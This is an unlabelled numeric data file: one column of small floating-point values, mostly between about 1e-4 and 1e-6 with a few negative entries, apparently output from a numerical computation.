0.000117746
0.000122005
0.000117768
0.000117739
0.000113235
0.0001132
0.000108944
0.00011321
0.000108917
0.000117711
0.000121994
0.000117742
0.000122018
0.000117735
0.000113216
0.000113208
0.000108982
0.000108946
0.000113183
0.000113215
0.000108939
0.000117732
0.000122003
0.000121968
0.000117747
0.000122004
0.000117739
0.000117768
0.000113235
0.000113199
0.000108943
0.00011321
0.000108918
0.000117711
0.000121995
0.00011774
0.000122019
0.000117735
0.000113218
0.000113208
0.000108947
0.00010898
0.000113215
0.000113182
0.000108942
0.000130798
0.000126507
0.000126508
0.000130799
0.0001308
0.000126509
0.000135345
0.000139499
0.000139563
0.000135314
0.00013531
0.000139531
0.000135376
0.000135347
0.000139501
0.000139566
0.000135317
0.000135376
0.000139533
0.000135313
0.000135296
0.000139581
0.000139582
0.000135293
0.00013958
0.000135294
0.000130755
0.000126525
0.000130781
0.000126586
0.000130781
0.000130726
0.000126554
0.000130758
0.000126527
0.000130785
0.000126587
0.000130726
0.000130784
0.000126555
0.000135302
0.0001308
0.000113224
0.000117716
0.000117721
0.000122011
0.000122011
0.000122008
0.000117716
0.000117717
0.000113179
0.000109002
0.000113203
0.000108944
0.000113153
0.000113205
0.000108974
0.000113179
0.000109004
0.000113205
0.000108946
0.000113207
0.000113155
0.000108975
0.000117773
0.000121992
0.000121925
0.000117739
0.000117803
0.000121959
0.000117734
0.000117773
0.000121993
0.000121928
0.000117739
0.000121959
0.000117735
0.000117805
0.000113222
0.000108924
0.000108924
0.000113224
0.000113225
0.000108927
0.000113225
0.000117717
0.000130796
0.000130781
0.000126549
0.000126523
0.000130769
0.000130792
0.000126519
0.000135297
0.000139575
0.000135319
0.000135314
0.000139593
0.000135309
0.000135327
0.000139554
0.000139582
0.000135339
0.000139583
0.000135313
0.000130809
0.000126523
0.000130781
0.000130791
0.000126505
0.000130793
0.000130781
0.000126548
0.000126522
0.000130766
0.000130792
0.000126517
0.000135295
0.000139575
0.000135318
0.000139593
0.000135314
0.000135308
0.000135327
0.000139554
0.000139582
0.000139584
0.00013534
0.000135313
0.000130807
0.000126522
0.00013078
0.000130789
0.000126504
0.000117732
0.000121969
0.000122004
0.000117749
0.000122006
0.000117768
0.00011774
0.000113236
0.000113201
0.000108945
0.000113211
0.000108919
0.000117712
0.000121995
0.000117742
0.000122019
0.000117735
0.000113218
0.00011321
0.000108984
0.000108949
0.000113185
0.000113216
0.000108942
0.000117731
0.000121969
0.000122002
0.000117749
0.000122004
0.000117769
0.000117738
0.000113235
0.000113199
0.000108943
0.000113209
0.000108918
0.000117712
0.000121995
0.000117741
0.000122019
0.000117736
0.000113217
0.000113208
0.00010898
0.000108947
0.000113181
0.000113214
0.000108941
0.000135302
0.000130798
0.000135301
0.000130797
0.000117719
0.00012201
0.00012201
0.000122007
0.000117714
0.000117714
0.000113177
0.000109001
0.000113199
0.000108941
0.000108973
0.000113153
0.000113202
0.000113178
0.000109002
0.000113202
0.000108942
0.000108974
0.000113153
0.000113204
0.000117771
0.000121992
0.000121927
0.000117736
0.00012196
0.000117803
0.000117732
0.000117772
0.000121992
0.000121928
0.000117738
0.000121959
0.000117803
0.000117733
0.00011322
0.00010892
0.000108921
0.000108924
0.000113221
0.000113222
0.000113221
0.000117714
0.000113224
0.000117716
0.00010012
9.56483e-05
0.000100119
9.56487e-05
9.56351e-05
9.13301e-05
9.13302e-05
9.56402e-05
9.56402e-05
9.13339e-05
0.000100184
0.000104341
0.000104408
0.00010015
0.000104371
0.000100144
0.000100212
0.000100184
0.000104341
0.000104408
0.000100151
0.000104371
0.000100145
0.000100212
0.00010013
0.000104429
0.000104429
0.000104423
0.000100124
0.000100124
9.55883e-05
9.13555e-05
9.56156e-05
9.14086e-05
9.56193e-05
9.13821e-05
9.55708e-05
9.55886e-05
9.13556e-05
9.56162e-05
9.14088e-05
9.56193e-05
9.13825e-05
9.55708e-05
7.8088e-05
8.25132e-05
7.80896e-05
8.2514e-05
8.25403e-05
8.68485e-05
8.68486e-05
8.68408e-05
8.2531e-05
8.25311e-05
7.80048e-05
7.38078e-05
7.80231e-05
7.37651e-05
7.80378e-05
7.79971e-05
7.37984e-05
7.8005e-05
7.38077e-05
7.80254e-05
7.37654e-05
7.80375e-05
7.79971e-05
7.37987e-05
8.26019e-05
8.6823e-05
8.67601e-05
8.25681e-05
8.67828e-05
8.25563e-05
8.26222e-05
8.26022e-05
8.68236e-05
8.676e-05
8.25694e-05
8.67832e-05
8.25569e-05
8.26223e-05
7.80566e-05
7.37327e-05
7.3733e-05
7.80641e-05
7.8064e-05
7.37407e-05
9.56321e-05
9.5623e-05
9.1361e-05
9.14081e-05
9.56271e-05
9.55833e-05
9.13537e-05
0.00010012
0.000104413
0.00010016
0.000104447
0.000100153
0.00010015
0.000100164
0.000104423
0.000104378
0.00010016
0.000104424
0.000100198
9.56629e-05
9.13563e-05
9.56119e-05
9.56248e-05
9.13178e-05
8.25603e-05
8.68282e-05
8.67707e-05
8.25688e-05
8.68336e-05
8.25731e-05
8.2627e-05
7.80995e-05
7.80218e-05
7.37655e-05
7.36986e-05
7.80316e-05
8.25097e-05
8.68238e-05
8.25774e-05
8.68747e-05
8.25645e-05
7.80388e-05
7.80302e-05
7.37758e-05
7.38426e-05
7.37606e-05
7.80294e-05
7.79603e-05
8.25622e-05
8.68283e-05
8.67733e-05
8.25681e-05
8.6836e-05
8.25724e-05
8.26298e-05
7.80985e-05
7.8021e-05
7.37651e-05
7.80326e-05
7.36989e-05
8.25102e-05
8.68247e-05
8.25758e-05
8.68772e-05
8.25643e-05
7.80407e-05
7.80307e-05
7.37768e-05
7.38449e-05
7.80294e-05
7.79642e-05
7.37629e-05
9.5637e-05
9.13309e-05
9.13297e-05
9.56419e-05
9.5641e-05
9.13346e-05
0.000100187
0.00010434
0.000104409
0.000100153
0.000100146
0.00010437
0.000100211
0.000100186
0.000104343
0.000104409
0.00010015
0.000100212
0.00010437
0.000100145
0.000100132
0.00010443
0.00010443
0.000100125
0.000104424
0.000100125
9.55925e-05
9.13555e-05
9.5618e-05
9.1407e-05
9.56211e-05
9.55696e-05
9.13849e-05
9.55911e-05
9.13541e-05
9.56126e-05
9.14072e-05
9.55688e-05
9.56197e-05
9.13836e-05
0.000100118
9.56459e-05
7.80883e-05
8.25116e-05
8.25382e-05
8.68482e-05
8.68471e-05
8.68396e-05
8.25295e-05
8.25281e-05
7.80015e-05
7.38039e-05
7.80228e-05
7.37624e-05
7.79922e-05
7.80353e-05
7.3795e-05
7.80009e-05
7.38052e-05
7.80226e-05
7.37607e-05
7.80344e-05
7.79942e-05
7.37946e-05
8.25995e-05
8.68236e-05
8.67561e-05
8.25684e-05
8.26186e-05
8.67821e-05
8.25546e-05
8.25989e-05
8.68216e-05
8.67573e-05
8.25653e-05
8.67816e-05
8.25527e-05
8.26195e-05
7.80537e-05
7.37303e-05
7.37291e-05
7.80617e-05
7.8061e-05
7.37381e-05
7.80842e-05
8.25106e-05
9.56329e-05
9.56241e-05
9.13631e-05
9.14095e-05
9.56278e-05
9.5584e-05
9.13551e-05
0.00010012
0.000104413
0.000100163
0.000104447
0.000100153
0.000100151
0.000100163
0.000104421
0.000104379
0.000100158
0.000104423
0.0001002
9.56632e-05
9.13575e-05
9.56143e-05
9.5625e-05
9.13186e-05
8.25637e-05
8.67737e-05
8.68301e-05
8.25722e-05
8.68365e-05
8.26318e-05
8.25759e-05
7.81014e-05
7.80236e-05
7.3768e-05
7.37015e-05
7.80357e-05
8.25121e-05
8.68253e-05
8.25785e-05
8.68778e-05
8.25665e-05
7.80434e-05
7.80352e-05
7.38473e-05
7.37783e-05
7.37649e-05
7.7967e-05
7.80329e-05
8.25647e-05
8.68302e-05
8.67736e-05
8.25734e-05
8.68366e-05
8.2576e-05
8.26329e-05
7.81044e-05
7.80242e-05
7.37714e-05
7.80369e-05
7.37045e-05
8.2513e-05
8.68267e-05
8.25792e-05
8.68775e-05
8.25684e-05
7.80455e-05
7.80383e-05
7.378e-05
7.38533e-05
7.80339e-05
7.79697e-05
7.37684e-05
9.56291e-05
9.56224e-05
9.14047e-05
9.13566e-05
9.5582e-05
9.56231e-05
9.13495e-05
0.000100118
0.000104414
0.000100161
0.000100152
0.000104446
0.000100149
0.000100165
0.00010438
0.000104422
0.000100199
0.000104423
0.000100158
9.56594e-05
9.13525e-05
9.561e-05
9.56222e-05
9.13131e-05
9.56309e-05
9.56233e-05
9.13572e-05
9.14051e-05
9.56248e-05
9.55832e-05
9.13505e-05
0.000100119
0.000104414
0.000100161
0.000104447
0.000100153
0.000100151
0.000100165
0.000104423
0.00010438
0.000104426
0.000100159
0.000100199
9.5661e-05
9.13537e-05
9.56111e-05
9.5624e-05
9.13143e-05
8.25589e-05
8.6766e-05
8.68237e-05
8.25684e-05
8.68301e-05
8.26271e-05
8.257e-05
7.80988e-05
7.80208e-05
7.37682e-05
7.80346e-05
7.37008e-05
8.25077e-05
8.68207e-05
8.25748e-05
8.68722e-05
8.25637e-05
7.80407e-05
7.8033e-05
7.38482e-05
7.37758e-05
7.79661e-05
7.80285e-05
7.37645e-05
8.25569e-05
8.68227e-05
8.67657e-05
8.25649e-05
8.68299e-05
8.25681e-05
8.26247e-05
7.80954e-05
7.80179e-05
7.37633e-05
7.80299e-05
7.36964e-05
8.25065e-05
8.68197e-05
8.25723e-05
8.68724e-05
8.256e-05
7.80363e-05
7.80305e-05
7.37736e-05
7.38429e-05
7.8026e-05
7.79616e-05
7.37593e-05
9.56385e-05
9.13328e-05
9.13324e-05
9.56431e-05
9.56426e-05
9.13375e-05
0.000100188
0.000104344
0.00010441
0.000100154
0.000100147
0.000104373
0.000100215
0.000100188
0.000104345
0.000104411
0.000100152
0.000100214
0.000104373
0.000100147
0.000100133
0.000104431
0.000104432
0.000100127
0.000104426
0.000100127
9.55925e-05
9.13568e-05
9.56186e-05
9.14117e-05
9.56216e-05
9.55733e-05
9.1388e-05
9.55923e-05
9.13566e-05
9.56168e-05
9.14108e-05
9.55723e-05
9.56215e-05
9.1388e-05
0.00010012
9.56485e-05
7.8088e-05
8.25158e-05
8.25418e-05
8.68511e-05
8.68506e-05
8.68434e-05
8.25331e-05
8.25323e-05
7.80052e-05
7.38072e-05
7.80261e-05
7.37655e-05
7.79967e-05
7.80388e-05
7.37986e-05
7.80049e-05
7.38076e-05
7.80247e-05
7.37648e-05
7.80383e-05
7.79956e-05
7.37985e-05
8.26032e-05
8.68243e-05
8.67606e-05
8.2569e-05
8.26228e-05
8.67859e-05
8.25587e-05
8.2603e-05
8.6825e-05
8.67601e-05
8.25697e-05
8.67863e-05
8.25578e-05
8.26224e-05
7.80573e-05
7.37334e-05
7.37326e-05
7.80652e-05
7.80645e-05
7.37409e-05
7.80889e-05
8.25132e-05
9.56271e-05
9.56154e-05
9.14035e-05
9.13537e-05
9.55775e-05
9.56193e-05
9.13486e-05
0.000100118
0.000104414
0.000100163
0.000100151
0.000104447
0.000100148
0.000100161
0.000104381
0.000104422
0.000100196
0.000104424
0.000100156
9.56589e-05
9.13531e-05
9.56124e-05
9.56214e-05
9.13135e-05
9.56301e-05
9.56201e-05
9.14067e-05
9.13564e-05
9.55834e-05
9.56229e-05
9.13506e-05
0.000100119
0.000104413
0.000100161
0.000104447
0.000100153
0.000100149
0.000100163
0.000104377
0.000104423
0.000104424
0.000100199
0.000100158
9.56614e-05
9.13537e-05
9.56112e-05
9.56232e-05
9.13148e-05
8.25596e-05
8.67672e-05
8.68229e-05
8.25663e-05
8.68307e-05
8.26283e-05
8.25696e-05
7.80986e-05
7.80228e-05
7.37671e-05
7.80339e-05
7.37001e-05
8.2509e-05
8.68215e-05
8.25772e-05
8.68736e-05
8.25639e-05
7.80402e-05
7.8031e-05
7.38464e-05
7.37761e-05
7.7965e-05
7.80286e-05
7.37634e-05
8.25587e-05
8.67648e-05
8.68242e-05
8.25665e-05
8.68307e-05
8.26273e-05
8.25703e-05
7.80986e-05
7.80193e-05
7.37646e-05
7.80307e-05
7.36977e-05
8.25075e-05
8.68215e-05
8.25739e-05
8.68723e-05
8.25625e-05
7.80396e-05
7.8031e-05
7.38441e-05
7.37763e-05
7.79641e-05
7.80287e-05
7.37616e-05
0.000100117
9.56453e-05
0.000100118
9.56463e-05
8.25355e-05
8.6844e-05
8.68443e-05
8.68366e-05
8.25267e-05
8.25262e-05
7.80001e-05
7.38039e-05
7.80201e-05
7.37608e-05
7.37954e-05
7.79913e-05
7.80333e-05
7.80005e-05
7.38042e-05
7.80216e-05
7.37602e-05
7.37956e-05
7.79925e-05
7.80325e-05
8.25969e-05
8.68179e-05
8.67554e-05
8.25647e-05
8.67797e-05
8.26161e-05
8.25528e-05
8.25973e-05
8.68196e-05
8.67563e-05
8.25655e-05
8.67793e-05
8.26171e-05
8.25518e-05
7.80519e-05
7.37281e-05
7.37279e-05
7.37363e-05
7.80595e-05
7.80589e-05
7.80844e-05
8.25086e-05
7.80851e-05
8.25093e-05
6.48823e-05
6.05449e-05
6.48846e-05
6.05478e-05
6.04702e-05
5.61089e-05
5.61096e-05
6.04867e-05
6.0487e-05
5.61307e-05
6.50105e-05
6.91801e-05
6.92378e-05
6.49863e-05
6.91868e-05
6.49585e-05
6.50073e-05
6.50115e-05
6.91799e-05
6.92388e-05
6.49881e-05
6.91876e-05
6.496e-05
6.50095e-05
6.49381e-05
6.92709e-05
6.92715e-05
6.92571e-05
6.49219e-05
6.49227e-05
6.04054e-05
5.61616e-05
6.04189e-05
5.61829e-05
6.04468e-05
5.62034e-05
6.04287e-05
6.04059e-05
5.61634e-05
6.04214e-05
5.61858e-05
6.04476e-05
5.62047e-05
6.0432e-05
4.30432e-05
4.7167e-05
4.30431e-05
4.71701e-05
4.73017e-05
5.1691e-05
5.16915e-05
5.16579e-05
4.72579e-05
4.72601e-05
4.27428e-05
3.85101e-05
4.27442e-05
3.84746e-05
4.27949e-05
4.28474e-05
3.85588e-05
4.27437e-05
3.85135e-05
4.27455e-05
3.84804e-05
4.27972e-05
4.28489e-05
3.85604e-05
4.74051e-05
5.16335e-05
5.16041e-05
4.73983e-05
5.15691e-05
4.73324e-05
4.73862e-05
4.74076e-05
5.1635e-05
5.16029e-05
4.74006e-05
5.15704e-05
4.73354e-05
4.73843e-05
4.28259e-05
3.83282e-05
3.83349e-05
4.28803e-05
4.28836e-05
3.84266e-05
6.04477e-05
6.04395e-05
5.61978e-05
5.63105e-05
6.04289e-05
6.03229e-05
5.61684e-05
6.48805e-05
6.92326e-05
6.49874e-05
6.93213e-05
6.49746e-05
6.49726e-05
6.49852e-05
6.92341e-05
6.91411e-05
6.49946e-05
6.9243e-05
6.50841e-05
6.05614e-05
5.61812e-05
6.04191e-05
6.04392e-05
5.60461e-05
4.7366e-05
5.162e-05
5.14783e-05
4.73943e-05
5.16453e-05
4.74149e-05
4.75669e-05
4.30887e-05
4.27858e-05
3.8585e-05
3.82297e-05
4.27905e-05
4.71809e-05
5.16226e-05
4.7398e-05
5.18102e-05
4.73946e-05
4.28293e-05
4.28148e-05
3.8586e-05
3.88048e-05
3.85092e-05
4.27788e-05
4.26091e-05
4.73679e-05
5.16216e-05
5.14837e-05
4.73955e-05
5.16475e-05
4.74146e-05
4.75717e-05
4.30883e-05
4.27841e-05
3.85801e-05
4.27898e-05
3.8228e-05
4.71816e-05
5.16275e-05
4.7399e-05
5.18132e-05
4.7397e-05
4.28303e-05
4.28142e-05
3.85854e-05
3.88015e-05
4.2778e-05
4.26087e-05
3.85084e-05
6.04658e-05
5.61068e-05
5.61059e-05
6.04806e-05
6.04833e-05
5.61287e-05
6.50068e-05
6.91744e-05
6.92361e-05
6.49823e-05
6.49567e-05
6.91832e-05
6.50048e-05
6.50074e-05
6.9177e-05
6.92344e-05
6.49842e-05
6.50071e-05
6.9183e-05
6.49553e-05
6.49343e-05
6.92679e-05
6.92676e-05
6.49183e-05
6.92534e-05
6.4918e-05
6.04015e-05
5.61596e-05
6.04102e-05
5.61839e-05
6.04353e-05
6.04259e-05
5.62016e-05
6.04033e-05
5.61592e-05
6.04159e-05
5.61868e-05
6.04301e-05
6.04441e-05
5.62024e-05
6.48795e-05
6.05436e-05
4.30415e-05
4.71695e-05
4.73032e-05
5.16913e-05
5.16905e-05
5.16575e-05
4.72625e-05
4.72584e-05
4.27473e-05
3.85119e-05
4.27471e-05
3.84862e-05
4.2845e-05
4.28e-05
3.85629e-05
4.2746e-05
3.85117e-05
4.27453e-05
3.84775e-05
4.27976e-05
4.28452e-05
3.85607e-05
4.74086e-05
5.1636e-05
5.16043e-05
4.74017e-05
4.73812e-05
5.15708e-05
4.7338e-05
4.74076e-05
5.16334e-05
5.16032e-05
4.73981e-05
5.15687e-05
4.7333e-05
4.7383e-05
4.28261e-05
3.83414e-05
3.83293e-05
4.28858e-05
4.28826e-05
3.84301e-05
4.30448e-05
4.71667e-05
6.04538e-05
6.04457e-05
5.6201e-05
5.63123e-05
6.04335e-05
6.03304e-05
5.61718e-05
6.48857e-05
6.92379e-05
6.49948e-05
6.93272e-05
6.49812e-05
6.49788e-05
6.49918e-05
6.92378e-05
6.91492e-05
6.49996e-05
6.92492e-05
6.50917e-05
6.05663e-05
5.61835e-05
6.04271e-05
6.04437e-05
5.60494e-05
4.73688e-05
5.14794e-05
5.16206e-05
4.7395e-05
5.16486e-05
4.75684e-05
4.74145e-05
4.30918e-05
4.27852e-05
3.85841e-05
3.82285e-05
4.27931e-05
4.71827e-05
5.16261e-05
4.73986e-05
5.18147e-05
4.73963e-05
4.28333e-05
4.28156e-05
3.88042e-05
3.85892e-05
3.85097e-05
4.26094e-05
4.2781e-05
4.73683e-05
5.1622e-05
5.14802e-05
4.73939e-05
5.16488e-05
4.74159e-05
4.75683e-05
4.30893e-05
4.27808e-05
3.85795e-05
4.27887e-05
3.8227e-05
4.71817e-05
5.16246e-05
4.73963e-05
5.18144e-05
4.73952e-05
4.28331e-05
4.28128e-05
3.85906e-05
3.88024e-05
4.27812e-05
4.26071e-05
3.85111e-05
6.04482e-05
6.04366e-05
5.6307e-05
5.61948e-05
6.03235e-05
6.04261e-05
5.61674e-05
6.48827e-05
6.92366e-05
6.4991e-05
6.49773e-05
6.93238e-05
6.49748e-05
6.49838e-05
6.91451e-05
6.92324e-05
6.50867e-05
6.92451e-05
6.49938e-05
6.0562e-05
5.61819e-05
6.04234e-05
6.04404e-05
5.60456e-05
6.04434e-05
6.04355e-05
5.61943e-05
5.63044e-05
6.04258e-05
6.03195e-05
5.61632e-05
6.48786e-05
6.92315e-05
6.49882e-05
6.93191e-05
6.49731e-05
6.49701e-05
6.49825e-05
6.92311e-05
6.91407e-05
6.92398e-05
6.49928e-05
6.50812e-05
6.05579e-05
5.61768e-05
6.04208e-05
6.04356e-05
5.60418e-05
4.73651e-05
5.14746e-05
5.16165e-05
4.73911e-05
5.1645e-05
4.75639e-05
4.74122e-05
4.30845e-05
4.27833e-05
3.85786e-05
4.27866e-05
3.82244e-05
4.71779e-05
5.16232e-05
4.73962e-05
5.18112e-05
4.73937e-05
4.28254e-05
4.28094e-05
3.87966e-05
3.85833e-05
4.26019e-05
4.27769e-05
3.85031e-05
4.73635e-05
5.16176e-05
5.14739e-05
4.73907e-05
5.16409e-05
4.7412e-05
4.75628e-05
4.30829e-05
4.27793e-05
3.85734e-05
4.27834e-05
3.82217e-05
4.71766e-05
5.162e-05
4.73927e-05
5.18076e-05
4.73899e-05
4.28272e-05
4.28093e-05
3.85801e-05
3.87961e-05
4.27739e-05
4.2602e-05
3.85044e-05
6.04694e-05
5.61088e-05
5.61082e-05
6.04862e-05
6.04859e-05
5.61296e-05
6.50104e-05
6.91803e-05
6.92375e-05
6.49882e-05
6.49593e-05
6.91867e-05
6.50086e-05
6.501e-05
6.91777e-05
6.92376e-05
6.49841e-05
6.50089e-05
6.91863e-05
6.4958e-05
6.49374e-05
6.9271e-05
6.92707e-05
6.49221e-05
6.92566e-05
6.49215e-05
6.04048e-05
5.61622e-05
6.04194e-05
5.61864e-05
6.04462e-05
6.04319e-05
5.62034e-05
6.0405e-05
5.61611e-05
6.0418e-05
5.61799e-05
6.04248e-05
6.04466e-05
5.62023e-05
6.48812e-05
6.05439e-05
4.3037e-05
4.71651e-05
4.73011e-05
5.169e-05
5.16899e-05
5.16562e-05
4.72588e-05
4.72573e-05
4.27418e-05
3.85079e-05
4.27414e-05
3.84773e-05
4.28473e-05
4.27928e-05
3.85555e-05
4.2743e-05
3.85107e-05
4.2744e-05
3.84761e-05
4.2797e-05
4.28471e-05
3.85564e-05
4.74049e-05
5.16323e-05
5.1604e-05
4.73966e-05
4.73837e-05
5.15668e-05
4.73327e-05
4.74062e-05
5.16331e-05
5.16014e-05
4.73971e-05
5.15679e-05
4.73324e-05
4.73824e-05
4.28253e-05
3.83309e-05
3.83333e-05
4.28808e-05
4.28809e-05
3.84247e-05
4.30426e-05
4.71667e-05
6.04478e-05
6.04429e-05
5.63069e-05
5.61968e-05
6.03217e-05
6.04296e-05
5.61663e-05
6.48815e-05
6.9234e-05
6.49912e-05
6.49753e-05
6.93222e-05
6.49743e-05
6.4989e-05
6.91422e-05
6.92342e-05
6.50863e-05
6.92443e-05
6.49965e-05
6.05608e-05
5.61798e-05
6.04229e-05
6.04386e-05
5.60449e-05
6.04482e-05
6.04391e-05
5.63115e-05
5.61943e-05
6.03229e-05
6.04274e-05
5.61678e-05
6.48799e-05
6.92321e-05
6.49895e-05
6.93211e-05
6.49749e-05
6.49722e-05
6.49834e-05
6.91394e-05
6.92336e-05
6.92424e-05
6.50839e-05
6.49939e-05
6.05614e-05
5.61809e-05
6.04226e-05
6.04382e-05
5.6045e-05
4.73658e-05
5.14758e-05
5.16187e-05
4.73927e-05
5.1645e-05
4.75663e-05
4.7415e-05
4.30866e-05
4.27829e-05
3.85804e-05
4.27878e-05
3.82271e-05
4.71805e-05
5.16228e-05
4.73981e-05
5.18106e-05
4.73968e-05
4.28286e-05
4.2813e-05
3.88028e-05
3.85864e-05
4.26054e-05
4.27797e-05
3.85083e-05
4.73678e-05
5.1483e-05
5.16175e-05
4.73927e-05
5.16475e-05
4.75691e-05
4.74124e-05
4.30868e-05
4.27835e-05
3.85782e-05
4.27872e-05
3.82257e-05
4.71805e-05
5.16242e-05
4.73963e-05
5.18119e-05
4.73944e-05
4.28312e-05
4.28114e-05
3.88006e-05
3.85841e-05
4.26067e-05
4.27767e-05
3.85078e-05
6.48786e-05
6.05411e-05
6.48792e-05
6.05426e-05
4.72983e-05
5.16867e-05
5.16874e-05
5.16534e-05
4.72552e-05
4.72546e-05
4.27402e-05
3.85074e-05
4.27398e-05
3.84765e-05
3.85573e-05
4.28457e-05
4.27917e-05
4.27418e-05
3.85059e-05
4.27429e-05
3.84778e-05
3.85573e-05
4.28459e-05
4.27951e-05
4.74026e-05
5.16293e-05
5.15984e-05
4.73946e-05
5.15647e-05
4.73803e-05
4.73296e-05
4.74028e-05
5.16309e-05
5.15997e-05
4.73965e-05
5.15666e-05
4.73804e-05
4.733e-05
4.28243e-05
3.83298e-05
3.83338e-05
3.8425e-05
4.28783e-05
4.28796e-05
4.3038e-05
4.71625e-05
4.3042e-05
4.71648e-05
2.89986e-05
2.54072e-05
2.89973e-05
2.53901e-05
2.46611e-05
1.95463e-05
1.95285e-05
2.48978e-05
2.48938e-05
1.99787e-05
2.96237e-05
3.391e-05
3.38434e-05
2.96784e-05
3.37839e-05
2.94567e-05
2.9615e-05
2.96205e-05
3.39094e-05
3.38482e-05
2.96761e-05
3.37836e-05
2.94541e-05
2.96125e-05
2.94043e-05
3.39895e-05
3.39992e-05
3.38723e-05
2.92086e-05
2.92076e-05
2.46475e-05
2.00707e-05
2.44958e-05
2.05297e-05
2.46421e-05
2.0407e-05
2.49234e-05
2.46428e-05
2.00609e-05
2.44878e-05
2.05248e-05
2.46328e-05
2.04021e-05
2.49184e-05
4.67206e-06
7.57319e-06
4.65599e-06
7.56045e-06
9.69163e-06
1.51035e-05
1.50893e-05
1.47022e-05
8.32795e-06
8.32817e-06
5.43824e-06
6.08726e-06
3.50289e-06
8.7457e-07
3.77039e-06
7.03841e-06
4.45469e-06
5.43444e-06
6.08488e-06
3.4936e-06
8.73117e-07
3.76471e-06
7.0325e-06
4.45431e-06
1.10363e-05
1.46894e-05
1.56075e-05
1.08322e-05
1.49742e-05
9.75186e-06
1.18242e-05
1.10361e-05
1.46792e-05
1.56037e-05
1.0824e-05
1.49714e-05
9.74993e-06
1.18218e-05
3.72447e-06
-4.96121e-06
-4.96705e-06
3.52773e-06
3.5292e-06
7.88792e-07
2.49135e-05
2.49465e-05
2.06159e-05
2.10567e-05
2.47386e-05
2.447e-05
2.02123e-05
2.9087e-05
3.38445e-05
2.95974e-05
3.43638e-05
2.97273e-05
2.95535e-05
2.97004e-05
3.38612e-05
3.36423e-05
2.97094e-05
3.39569e-05
3.00401e-05
2.55917e-05
2.06349e-05
2.47103e-05
2.46201e-05
1.94013e-05
9.91645e-06
1.52968e-05
1.48363e-05
1.17232e-05
1.53073e-05
1.15801e-05
1.19326e-05
4.24767e-06
3.18515e-06
1.82854e-06
-1.09544e-05
2.46578e-06
7.78484e-06
1.45059e-05
9.69403e-06
1.63586e-05
1.0623e-05
5.04857e-06
7.6256e-06
4.77018e-06
5.17004e-06
2.63149e-06
6.23536e-06
5.1437e-06
9.91837e-06
1.52952e-05
1.48337e-05
1.17218e-05
1.53021e-05
1.15796e-05
1.19424e-05
4.23677e-06
3.18435e-06
1.81159e-06
2.47212e-06
-1.09646e-05
7.78433e-06
1.45032e-05
9.69759e-06
1.63542e-05
1.06188e-05
5.05447e-06
7.62386e-06
4.75415e-06
5.16353e-06
6.23441e-06
5.14575e-06
2.62398e-06
2.46495e-05
1.95338e-05
1.95204e-05
2.48856e-05
2.4879e-05
1.99732e-05
2.96172e-05
3.39135e-05
3.38503e-05
2.9678e-05
2.94466e-05
3.3783e-05
2.96155e-05
2.96201e-05
3.39098e-05
3.38486e-05
2.96721e-05
2.9613e-05
3.37835e-05
2.9457e-05
2.93986e-05
3.39979e-05
3.39965e-05
2.91907e-05
3.38712e-05
2.92085e-05
2.46397e-05
2.00598e-05
2.44865e-05
2.05231e-05
2.46289e-05
2.49184e-05
2.03994e-05
2.46338e-05
2.00485e-05
2.44746e-05
2.05216e-05
2.49109e-05
2.46182e-05
2.03969e-05
2.89934e-05
2.53647e-05
4.66568e-06
7.57275e-06
9.69417e-06
1.51073e-05
1.50901e-05
1.46985e-05
8.31987e-06
8.33029e-06
5.43842e-06
6.0909e-06
3.50296e-06
8.86473e-07
7.04025e-06
3.76166e-06
4.4631e-06
5.43749e-06
6.09619e-06
3.49927e-06
8.82089e-07
3.78295e-06
7.03458e-06
4.47677e-06
1.10345e-05
1.46861e-05
1.56033e-05
1.08279e-05
1.18209e-05
1.49705e-05
9.74865e-06
1.1043e-05
1.46795e-05
1.56017e-05
1.08254e-05
1.49687e-05
9.74871e-06
1.1828e-05
3.73017e-06
-4.93519e-06
-4.94017e-06
3.52826e-06
3.55021e-06
8.11622e-07
4.65558e-06
7.56958e-06
2.49026e-05
2.49363e-05
2.05984e-05
2.10481e-05
2.47254e-05
2.44616e-05
2.0197e-05
2.90767e-05
3.38392e-05
2.95874e-05
3.43603e-05
2.97209e-05
2.95565e-05
2.96983e-05
3.38701e-05
3.36442e-05
2.97156e-05
3.3962e-05
3.00403e-05
2.55817e-05
2.06362e-05
2.47012e-05
2.46118e-05
1.94065e-05
9.89375e-06
1.48236e-05
1.52881e-05
1.17031e-05
1.52943e-05
1.19254e-05
1.15633e-05
4.19922e-06
3.1599e-06
1.79382e-06
-1.1025e-05
2.43741e-06
7.75194e-06
1.44959e-05
9.68637e-06
1.63462e-05
1.05962e-05
5.00844e-06
7.59647e-06
5.1494e-06
4.71625e-06
2.58838e-06
5.11683e-06
6.19275e-06
9.92655e-06
1.52846e-05
1.48231e-05
1.17134e-05
1.52905e-05
1.15781e-05
1.19252e-05
4.24473e-06
3.16523e-06
1.78062e-06
2.45395e-06
-1.10096e-05
7.79458e-06
1.45024e-05
9.70017e-06
1.63476e-05
1.06256e-05
5.03695e-06
7.60054e-06
4.72274e-06
5.13133e-06
6.20035e-06
5.12624e-06
2.57284e-06
2.49025e-05
2.4937e-05
2.10449e-05
2.06028e-05
2.44603e-05
2.47267e-05
2.01981e-05
2.90795e-05
3.38376e-05
2.95863e-05
2.97204e-05
3.43582e-05
2.95459e-05
2.96942e-05
3.36369e-05
3.3856e-05
3.00349e-05
3.39498e-05
2.97025e-05
2.55859e-05
2.06258e-05
2.46948e-05
2.46103e-05
1.93902e-05
2.49056e-05
2.49373e-05
2.06031e-05
2.10455e-05
2.47278e-05
2.44624e-05
2.02014e-05
2.90803e-05
3.38357e-05
2.95845e-05
3.43552e-05
2.97194e-05
2.95481e-05
2.96931e-05
3.38552e-05
3.36391e-05
3.39499e-05
2.9702e-05
3.00363e-05
2.55871e-05
2.06254e-05
2.47092e-05
2.46124e-05
1.93945e-05
9.89504e-06
1.48183e-05
1.52764e-05
1.17024e-05
1.52815e-05
1.19266e-05
1.15556e-05
4.21203e-06
3.1668e-06
1.78131e-06
2.44532e-06
-1.10452e-05
7.76562e-06
1.44854e-05
9.70047e-06
1.63245e-05
1.06052e-05
5.02046e-06
7.60049e-06
5.14103e-06
4.72143e-06
5.12214e-06
6.19984e-06
2.58131e-06
9.8921e-06
1.52782e-05
1.48144e-05
1.1705e-05
1.52822e-05
1.15568e-05
1.19094e-05
4.22871e-06
3.16406e-06
1.77669e-06
2.44732e-06
-1.10252e-05
7.77305e-06
1.44852e-05
9.68679e-06
1.63255e-05
1.06096e-05
5.02889e-06
7.60307e-06
4.73347e-06
5.12979e-06
6.20363e-06
5.12242e-06
2.57723e-06
2.46505e-05
